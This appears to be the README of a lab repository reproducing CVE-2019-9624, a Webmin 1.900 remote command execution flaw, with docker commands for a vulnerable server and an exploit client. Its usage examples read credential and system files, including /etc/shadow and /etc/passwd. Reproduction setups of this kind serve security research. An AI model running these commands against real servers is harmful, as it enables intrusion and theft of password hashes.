CVE-2019-9624

CVE-2019-9624

About

• https://nvd.nist.gov/vuln/detail/CVE-2019-9624

Exploit

• https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html

Environment used

• Ubuntu 18.04.4 LTS
• Webmin 1.900

Reproduction

• Server
  • Docker version

    docker run --rm -p 10000:10000 -it simaofsilva/cve-2019-9624

  • Script version

    sudo bash installation.sh

• Client

docker run --rm simaofsilva/cve-2019-9624-client --host SERVER_IP --port 10000 --user test --pass qwerty --file FILE_TO_GET

A file will be uploaded allowing to any user to see any system file.
Examples of use:

• https://SERVER-IP:10000/file/show.cgi/etc/shadow
• python3 exploit.py --host <SERVER-IP> --port 10000 -u test --pass qwerty --file "/etc/passwd"